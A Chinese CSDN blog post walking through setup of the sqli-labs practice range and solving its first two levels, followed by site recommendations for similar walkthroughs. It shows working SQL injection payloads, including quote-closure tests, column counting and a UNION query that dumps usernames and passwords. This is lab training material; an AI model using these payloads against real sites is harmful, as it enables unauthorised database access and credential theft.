sql-labs小练习

最新推荐文章于 2024-07-31 22:18:21 发布
最新推荐文章于 2024-07-31 22:18:21 发布
阅读量95 收藏
点赞数
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Rongyao/article/details/132744892
版权

靶场搭建

phpstudy安装就不说了

链接:https://pan.baidu.com/s/1Ng0uKX9kL0D3gRmGkRb9YA?pwd=pm00
提取码:pm00

下载后把文件解压到phpstudy安装路径的www文件夹下

在这里插入图片描述

用记事本打开phpstudy_pro\WWW\sqli-labs-master\sql-connections目录下的db-creds.inc文件

在这里插入图片描述

修改文件中的用户名与密码,要求与phpstudy中的数据库名字和密码一致

在这里插入图片描述

完成之后就可以在浏览器中尝试访问靶场了

在这里插入图片描述

如果在访问中出现报错,把报错的内容复制下来在浏览器中度娘几乎都能给出解答

案例复现

less-1

在这里插入图片描述

判断注入点

首先尝试输入id=1

在这里插入图片描述

判断闭合符号

?id=1'   //报错
?id=1' --+

在这里插入图片描述

在这里插入图片描述

说明是’闭合

判断列数

?id=1' order by 3 --+

在这里插入图片描述

测试结果为3列

联合查询

id=-1' union select 1,2,3 --+

在这里插入图片描述

这一步的目的是给数据库一个不存在的id,然后看出我们输入的数据在哪里显示出来

这样一来,我们就可以在2,3处显示自己想要的内容了。

less-2

判断注入类型

1' and '1'='1	
1 and 1=1

看页面回显位的反馈,如果一致,则是字符注入,否则就是数字注入。

在这里插入图片描述

所以less02是数字型注入 ,就不用了再添加闭合符号了

其他步骤跟第一关一样,所以我们直接获取账号密码

?id=-1 union SELECT 1,2,(select group_concat(username,0x3a,password) from users)

在这里插入图片描述

离拥
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sql-labs通关技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
sql-labs靶场练习
m0_74097148的博客
03-04 397
这一关开始发现是post传参,是在输入框中输入,但总体思路不变一般POST型使用1' or 1=1 -- #和1" or 1=1 -- # 来判断闭合方式,成功的概率最大因单双引号引起的闭合问题更大点判断注入类型发现是字符型判断闭合方式(发现是单引号闭合)判断字段数(发现是两列)判断回显位(发现两列均可以回显) 判断数据库名 爆出表名 爆出列名 爆出用户名和密码采用“1\”直接爆出闭合方式为:(" ")判断字段数(发现是两列)如图是回显位爆出数据库名,语句和lese-1一样,闭合方式换换就可以了这关只有登录
SQL-Labs靶场“46-50”关通关教程
钟言的博客
02-24 1万+
本篇为SQL-Labs靶场的第46关到50关教程,详细内容包含了:四十六关 ORDER BY数字型注入 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 5、报错注入 6、Limit注入 四十七关 ORDER BY单引号报错注入 1、源码分析 2、报错注入 3、时间盲注 三、四十八关 ODRER BY数字型盲注 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 四、四十九关 ORDER BY单引号盲注1、源码分析 2、时间盲注 五、五十关 ORDER BY数字型堆叠注等
sql-labs靶场环境搭建(手把手保姆级教学)
焦虑的焦虑
05-26 2289
sql-labs靶场搭建(保姆级手把手教学)你来你也行噢!
SQL-Labs靶场“36-37”关通关教程
钟言的博客
03-19 3421
本篇为SQL-Labs靶场的36关到37关的通关教程,详细内容包含了:一、36关 GET单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入37关POST单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入等内容
SQL-Labs靶场“34-35”关通关教程
钟言的博客
03-18 2537
本篇为SQL-Labs靶场的34到35关教程,详细内容包含了:34关 POST单引号宽字节注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 4、floor报错注入 35关 GET数字型报错注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 4、floor报错注入等内容
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
Sql-labs-master 打靶练习
a96482的博客
07-23 774
id=1 and 1=2--+ //1=2结果为假,所以页面显示异常。id=1'and 1=1--+ //1=1为真,所以页面正常显示。id=1 and 1=1--+ //1=1为真,所以页面正常显示。//联合查询3列,把前面的id值改成不存在的,页面显示我们查询出来的2和3,2和3被叫做回显位置,那么我们可以在2和3的地方进行sql注入。//联合查询3列,把前面的id值改成不存在的,页面显示我们查询出来的2和3,2和3被叫做回显位置,那么我们可以在2和3的地方进行sql注入。
sql-labs靶场环境搭建(手把手教你如何搭建)
Joker_Dgh的博客
04-02 3万+
sqli-labs介绍 SQLI-LAB下载地址: https://github.com/Audi-1/sqli-labs WEB环境搭建: 在安装靶场之前,我们还需要搭建web运行环境: 这里直接使用phpstudy进行搭建,phpStudy是一个PHP调试环境的程序集成包。安装后一键启动即可运行web环境:Windows版phpstudy下载 - 小皮面板(phpstudy) (xp.cn) 下载后安装即可。 Sql-labs靶场环境搭建 安装好phpst..
SQL-Labs靶场“21-25”关通关教程
钟言的博客
02-20 1万+
本篇为SQL-Labs靶场的21关到25关通关教程,详细内容包含了、二十一关 基于base64编码单引号Cookie注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 、二十二关 基于base64编码双引号Cookie注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 二十三关 基于GET过滤注释 1、源码分析 2、updatexml报错注入 3、联合查询注入 四、二+四关 基于POST存储型二次注入 1、源码分析 2、二次注入 五、二十五关 基于GET单引号OR、A等等
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
SQL-li-labs则是针对SQL注入攻击的练习平台,帮助学习者理解如何预防这种类型的攻击。 首先,我们来详细了解一下PHPStudy。PHPStudy提供了一个简单的界面来管理PHP版本切换、Apache和Nginx服务器的启动与停止,以及...
sql-labs
03-07
"SQL-Labs" 是一个可能的数据库学习平台或者是一系列SQL练习题目集合,主要用于帮助用户提升SQL查询和数据处理技能。由于没有具体的标签提供更多信息,我们可以假设这是一个综合性的SQL实践项目,涵盖了各种SQL语言...
windows环境下安装sqli-labs
11-04
然后,我们可以开始我们的 SQL 注入练习。 结语 在这里,我们已经成功安装了 sqli-labs。在 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。我们需要准备好 Apache、PHP、MySQL 和 ...
MySQL:初识数据库&初识SQL&建库
最新发布
2401_83595513的博客
07-31 952
MySQL&数据库服务&数据库&SQL
简单的 mongoDB 学习
qq_19342829的博客
07-31 496
mongodb入门学习整理
社区养老服务小程序的设计
Karen198的博客
07-31 513
管理员账户功能包括:系统首页,个人中心,用户管理,服务人员管理,服务产品管理,服务预约管理,服务状态管理,服务退订管理,活动管理,视频管理。主要技术:Java,Spring,mybatis,mysql,jquery,html。服务器:SpringBoot自带 apache tomcat。微信端账号功能包括:系统首页,服务产品,活动,视频,我的。JDK版本:Java JDK1.8。数据库可视化工具: navicat。数据库版本: mysql5.7。开发工具:IDEA(推荐)开发系统:Windows。
二进制部署k8s集群之master节点和etcd数据库集群(上)
zx52306的博客
07-30 1182
【代码】二进制部署k8s集群之master节点和etcd数据库集群(上)
sql注入sql-labs
09-12
Sql注入sqli-labs是一个提供了各种不同难度级别的SQL注入漏洞练习的实验环境。要访问sqli-labs,你可以通过打开网站管理界面->打开sqli-labs来直接进入。点击第一行的"Setup/reset Database for labs"可以看到各个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值